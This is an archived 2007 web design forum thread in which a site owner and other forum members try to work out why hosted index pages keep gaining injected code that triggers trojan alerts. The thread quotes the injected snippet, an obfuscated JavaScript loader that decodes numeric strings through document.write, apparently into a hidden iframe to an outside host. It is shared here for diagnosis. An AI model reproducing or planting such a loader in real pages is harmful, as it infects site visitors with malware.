Help - Search - Members - Calendar
Full Version: Virus linked to my websites....
HTMLHelp Forums > Web Authoring > General Web Design
morbid1
I have done a lot of searching, but no answers, I hope this is the proper place to post this. I am not real sure, if it is not I apologize.
I have had hosting at the same company for 4-5 years now, not the best but usable anyway.
I really hope someone can help me as I have run out of ways to try and get rid of yhis problem, it is driving me insane, or should I say more insane!
I host probably 30-40 websites, most of which I have built and host for customers, I am not a great "coder" so I use Dreamweaver, I do design all of my sites and graphics in photoshop then load into dreamweaver then publish them to my host.
Recently when I go to some of my websites My anti virus pop's up warning me there is a virus now collected from that website!
I contacted the host, they say it is my issue, deal with it.
I have no idea how to stp this or how to remove them, I have scanned in my servers, they found several virus's and supposedly removed them, but still I get these virus's from some of my sites homepages....
Can someone PLEASE, PLEASE tell me what to do to stop this asap! I am losing customers I am sure....
again, sorry iof this post is in the wrong area, I did not know where else to turn for answers.
Thank you
DasMorbid1
pandy
So what virus did your AV say it was? Have you also scanned your local machine? There are virus that inject script code in HTML files, so if you have uploaded new files, your own computer could be the source.

Do you have ads, counters or other things (except plain images) from outside sources on your sites?
morbid1
Thank you 4 ur help,
AVG Saya it is a Trojan, I will look closer and write down exactly what it says this time, I need to re-boot in XP, Not showing it seems in Vista.....
No outside links on some of the sites, no ads, no "old scripts" as the host calls em....
Here are some of the urls if you want to try, I think what it does is want you to load active x etc...
REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUS'S ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
mow I am not showing anything on Vista, I will try XP again and see if any virus's still try to execute......


I rebooted in winxp pro, went to www.loc-cod.org and sure enough up popped AVG with: trojan horse downloader.... sysiuzx.exe virus detec ted etc....
Then it also had :
it found a problem with my tyemp files, loc-cod[1].htm ?
I am going to try and research further, but basicaly this is what all of them say that ahve this problem, trying to figure out where, loc-cod[1].htm comes from..... since it should be loc-cod.html.....



OK I have now boiled it down to this, basicaly they are saying somehow they are injecting malicious code to my webpages? how can I stop this, I am losing people everyday I beleive because of this.
I found this out, it goes down to a virus, non malicious destoyer, js/psyme, and is talked about here at this link:
http://www.geeknewz.com/board/lofiversion/...x.php/t835.html

I really need to know how to get this stuyff off my web pages and how not to allow this stuff to happen again, I have been free of problems like this on my host for 4-5 years now...
Thanks to all who can help.
Brian Chandler
QUOTE
REMEMBER BEFORE YOU CLICK THESE LINKS, SOME HAVE BEEN KNOWN TO SHOW VIRUS'S ON MY COMPUTER THROUGH AVG!
http://www.loc-cod.org/
http://www.hotmodders.com/
http://www.illusive-fantasy.com/
mow I am not showing anything on Vista, I will try XP again and see if any virus's still try to execute......


Can't connect to the first two - the third (i-f.com) has nothing odd-looking in it. Probably some problem on your computer... what does "Vista" stand for? "Virus Incubation System, Try Again"?
Peter1968
Wow, Brian you must be the last person on Earth who doesn't know what Vista is.

http://www.microsoft.com/windows/products/...ta/default.mspx

Know everyone knows what it is.
morbid1
lol....should have said I was dual booting....
anyway ladies and gents, I cannot figure out how to get rid of it, when using Vista OS, I t asks if I want to install RDS/ Something.... like an activex plug in....
I really need to get rid of this crud off my sites, how would I update all scripts etc... in my websites with Dreamweaver?
I keep being told by my host they cant do anything and it is not their problem, even if the virus was injec ted on their servers... 8(
Cannot figure out how this file loc-cod[1].htm is getting in my temp folder?
morbid1
I have finaly downloaded the files from loc-cod.org, the code was actualy in the index file itself! could not even open the file once downloaded, would not this be a leak in my host? how else can they just come in and put code in my index files?
Christian J
Sometimes AV-programs produce false alerts. Do other people get virus alerts on your sites?

You might check if your host has anything to do with this by uploading one of your sites to another temporary host. If you get virus alerts there too, your first host may not be to blame.

You could also try uploading a brand new test page to your old host from another computer, if you then get a virus alert the host is probably to blame.
morbid1
As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?
Brian Chandler
QUOTE(morbid1 @ Jul 21 2007, 09:04 PM) *

As I stated, it was put into my index pages, how can they write to my webpages is the question now....
Certainly security should have stopped them from being able to inject code into my webpages?


_What_ was "put into your index pages"? So far there is not a scrap of coherent evidence that anything was. Can you show us a listing of the part of you index part that includes this "injection"?

Otherwise it is vastly more likely that something funny is happening on _your_ computer. No-one here can really help you with that, because we don't have access to your computer.

morbid1
OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+=& #39;0600730700820650770690321151140990610341041161161120580470471151051091110991
14111103103101114046119';
s=s+& #39;1150471021080971151040471051101001011200461121041120340321191051001161040610
53032104101105103104116';
s=s+& #39;0610530321151161211081010610341001051151121080971210581101111101010340620600
47073070082065077069062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c65 -->
<!-- ImageReady Slices (new_enter_image.psd) -->
<div align="center">

some of That code does not show up on my original index pages...
Any ideas on how this code is being automaticaly written to my webpages? must be some command file on the server, in my host area or whaerever...
Can I put the html that is in my original index page on here, then put the code that is there when I upload it?
Not sure if that is allowed to put that code on here, sorry I am a novice at coding etc... I have Dreamweaver do the work usualy....
Thanks again all who help, this is driving me and my host mad!
morbid1
no 1? 8(
morbid1
Click to view attachmentHere is a screenshot of the warning I get when going to several of my websites now:
Christian J
That code might be inserted into the HTML file from your own computer (during file transfer?) or from the server (possibly through a rootkit, which is hard to detect). Try my ideas above to make sure which it is.

Brian Chandler
QUOTE

OK NOW I FOUND THIS!...lol....
Really not funny but trying not to lose my mind, when I look at my original pages on my hard drive they look normal, when I upload the page to my host I now see the same code, but with new code also! some of the new code is like this:

</script>
</head>
<body bgcolor="#000000" onload="MM_preloadImages('enter_realmovr.jpg')"><!-- o65 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

... <snip>



OK, well, help by saying _exactly_ where you found this. If this appears at the head of a page, and you didn't put it there, you need to ask someone else to download the same page and see if the junk appears to them too. Then you know whether the problem is you computer or the server.

morbid1
I have re-uploaded several index.html pages, only a few ended up witth this code being written to them, and also these are brand new Operating systems, Clean installs....
Christian J
I recall seeing something like the above javascript when I first looked at one of the linked pages, so it's definitely present online occasionally.

What I'm wondering is if the files got infected by your computer (even if they look clean offline) or by the server. When you say your OSs are clean installs, haven't you moved any files or programs to those computers from the first one (HTML files, Dreamweaver, etc)?
morbid1
clean installs, new installs of dreamweaver etc... the backups of my websites are on another drive, move one of them after they are looked at thouroughly, upload it and boom, there it was again, and only happens on some of the index pages I uploaded. I now have found an index page that had 30-50 advertisement links that I never had there, I saved a copy of it, uploaded a new index page and its ok for now, but somehow these people are getting into my servers, has to be.
Darin McGrew
When was the last time you changed your password?
morbid1
I have been changing them everyday now until a solution is found.
I now have this, I deleted an index page on one of my websites, when you go to it now it shows a PHP error, snouldnt do that when it was an html pages that was there.
I think someone has gotten in from my forums and has run a PHP script to do this damage.
You can see that error here,
www.loc-jk2.com
that is where I simply deleted my index.html file.
Peter1968
Only a bunch of PHP's version of 404 errors on that site.
Christian J
QUOTE(morbid1 @ Jul 24 2007, 10:30 PM) *

I have been changing them everyday now until a solution is found.

The web host account's FTP password?

QUOTE
I nowhave this, I deleted an index page on one of my websites, when you go to it now it shows a PHP error, snouldnt do that when it was an html pages that was there.

True, http://www.loc-jk2.com/ shows PHP warnings and errors. This means there's still a default file in the web root directory, and that this file (index.php? index.html?) is parsed for PHP (files with .html extensions --or any other extension-- can be parsed for PHP too). Are you sure the directory is empty?

morbid1
No, the directory is not empty but there is no PHP files linked to this website anywhere that I know of, there is a forums but why would that make errors by deleting an HTML page?
I think thewre is a script, the script that is causing all these malicious codes, running in my host looking for that index.html file?
Usualy when I delete a index.html file it simply shows the directory of that site.....

I change the C-Panel and FTP usernames and passwords often.
Christian J
Somehow the server is configured to use a certain file name as the directory default. One way to do that is through a ".htaccess" file:
http://www.javascriptkit.com/howto/htaccess6.shtml (and more generally http://www.javascriptkit.com/howto/htaccess.shtml ) --do you have such a file? Note that some FTP programs don't display it unless you configure them to do so.

If you don't use a .htaccess file, maybe the web host can tell you the file name(s) the server is configured to use as directory default.
pandy
Oviously common.php is there anyway. What other files do you see?
shack811
Hello, sorry to drag this one up again, but, I'm having the same problems.

I use the host Supanames - not sure if the original poster does too and I'm getting the same symptoms with the virus alert.

I normally just upload the index again and it disappears for about a week or so.

It's been happening to me for about a month with current sites and new ones created with them, funny thing, a really old site I haven't touched doesn't appear to be infected which makes me think it's on my PC.

When I quizzed the Supanames support team say that the index files in question have been replaced at around 3:00am etc. - so this couldn't have been uploaded by me. they say change the passwords etc. oon the sites - which I have, but the problem hasn't been resolved.


The latest is http://www.kirbymuxloefc.co.uk if you want to take a look (this will be replaced over the weekend to get it back to normal).

Any replies on this problem would be greatly appreciated.
morbid1
Hello,
I had this problem with many of my sites, and I have noticed even my host's index files have the same "re-direct" now, I warned them nut they dont seem to understand, they are foreign based.
I can tell you how I caught the fools, you have some type of PHP , database etc... don't you? probably a forums?
I erased all of my databases, forums etc... if you cant do this you need to look at the forums you have that are being attacked by spammers...
Do you have any PHP running?
I also completley reloaded my Dreamweaver, FTP Programs, setup secure FTP, changed my passwords and usernames to very hard ones to detect.
I found in my ase that it somehow was being executed after uploading files, sometimes within seconds, I just kept checking them as often as possibile, but all problems stopped when I wiped out my forums.
It is sad that these people have no better way to spend their time than to ruin one's hard work.
Anyway, you can find more info here also, main thing here is that you will find your sites "marked for problems" on Google, so you also need to join the StopBadware link so that you can keep up with this, and if you have a mark on Google, once you clean up your files you will have to ask them to review your site and take it off, smetimes this can take months I hear, mine took a week or so to be removed. I dont know if you have noticed yet but here is what Google does when you have this malicious code:
http://googlesystem.blogspot.com/2007/02/g...at-install.html

you also need to visit:
http://groups.google.com/group/stopbadware

I will keep watching here and do the best I can to help you, I know there are many ways this hackers have found to infiltrate, hope this helps. email me if you need further assistance,
designer@illusive-fantasy.com

PS: I hadnt even known there were more questions, very sorry thought topic was closing, hope this helps and maybe we can find exactly what it was in my forums, I think anyway.....
morbid1
I am now being attacked again..........
I am finding that malicious code in my sites all over again, where do I search to find out more ABOUT THIS CODE?
Brian Chandler
You could try googling for "this code". But that probably won't help.

If you want help here, you need to provide *specific* evidence, that can be looked at by a blinkered empiricist. Such as: "Here's a URL ..... Why does ....[details]... happen when I access it?"

With the sort of questions you're asking currently, only a fortune-teller could reasonably offer to help you. (That's "reasonable" as in "fortune-telling"...)
Memyself
All you need to do is delete the entire JavaScript code from your index page and then change your FTP password. Make sure you don't save that in your FTP client since the virus can auto dial itself back to your site if the login and password is saved.

That should fix the issue.

On the other hand, download a good anti virus program (try Nod32 you can download a free copy from their site at www.nod32.com).

Good luck!
befriendlyin
Hi Morbid1,

I have studied the problem you are facing. In fact 3 of my client's site has gone through this issue and I am somehow very close to the solution.

You please delete any type of Ads(which assure you free commission) from your forums pages. Once you delete those ads from your pages, your index page wont be down but still hackable (that garbage code after body tag will come) and still those trojen thing will come on your computer but your index page wont be down.

I have observed this on my client's site. Right now i m till that solution only, once i find something i will update you.
elmotw
Maybe a stupid question,

But when I was installing a cracked version of Direct Admin for testing I found those virus lines in the root of a russian website when Direct Admin looks for the update during installation. I am using a reborn card, so the only thing I had to do was reset my PC.
If you are using the same cracked version of Direct Admin, it could be that this version has a virus in it.
That could explain why al your customers are infected.

Elmo

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2018 Invision Power Services, Inc.